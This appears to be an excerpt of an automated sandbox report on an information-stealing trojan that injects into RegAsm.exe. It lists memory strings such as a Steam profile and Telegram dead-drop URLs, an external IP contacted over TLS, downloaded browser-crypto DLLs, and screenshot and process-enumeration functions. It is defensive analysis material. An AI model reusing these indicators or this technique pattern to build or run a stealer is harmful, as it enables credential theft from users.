                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=N0D1
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jU8h8CqVh6FY&l=e
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: GDHIEHJE.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: GDHIEHJE.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: GDHIEHJE.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/QFp
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: file.exe, file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888$aM
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
                        Source: file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/yF
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: file.exe, file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/irfail
                        Source: file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/irfailAt
                        Source: unknown HTTPS traffic detected: 184.30.122.179:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00411D10 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_6C81ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_6C85B8C0 rand_s,NtQueryVirtualMemory
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_6C85B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_6C85B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_6C7FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
                        Source: C:\Users\user\Desktop\file.exe Code function: String function: 003C6A00 appears 49 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C82CBE8 appears 134 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00402360 appears 286 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8394D0 appears 90 times
                        Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/25@1/2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_6C857030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00410AA0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.5.dr, freebl3[1].dll.5.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.5.dr, freebl3[1].dll.5.dr
                        Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3.dll.5.dr, softokn3[1].dll.5.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.5.dr, vcruntime140.dll.5.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.5.dr, msvcp140[1].dll.5.dr
                        Source: Binary string: nss3.pdb source: RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.dr
                        Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
                        Source: Binary string: softokn3.pdb source: softokn3.dll.5.dr, softokn3[1].dll.5.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004185A0
                        Source: softokn3.dll.5.drStatic PE information: section name: .00cfg
